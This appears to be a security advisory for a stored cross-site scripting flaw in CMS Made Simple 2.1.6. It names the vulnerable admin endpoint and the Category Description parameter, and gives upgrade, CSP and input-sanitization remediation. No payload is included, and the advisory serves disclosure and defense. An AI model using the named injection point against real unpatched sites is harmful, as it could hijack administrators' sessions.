Cross Site Scripting (Category Description) (CMS Made Simple)
Description
CMS Made Simple version 2.1.6 contains a Cross-Site Scripting (XSS) vulnerability in the administrative interface at /admin/moduleinterface.php. Authenticated users with access to the Design Manager can inject malicious JavaScript or HTML code through the Category Description field (m1_description parameter). When other administrators view the affected category, the injected script executes in their browser context, potentially compromising their session or performing unauthorized actions.
Remediation
Upgrade CMS Made Simple to version 2.2 or later, which addresses this vulnerability. If immediate upgrading is not possible, implement the following temporary mitigations:
1. Restrict access to the Design Manager and category management features to only trusted administrators
2. Implement Content Security Policy (CSP) headers to limit the execution of inline scripts
3. Review all existing category descriptions for suspicious content and sanitize if necessary
4. Monitor administrative access logs for unusual activity
For custom implementations, ensure all user input is properly sanitized using HTML encoding functions before rendering:
// Example PHP input sanitization $description = htmlspecialchars($_POST['m1_description'], ENT_QUOTES, 'UTF-8');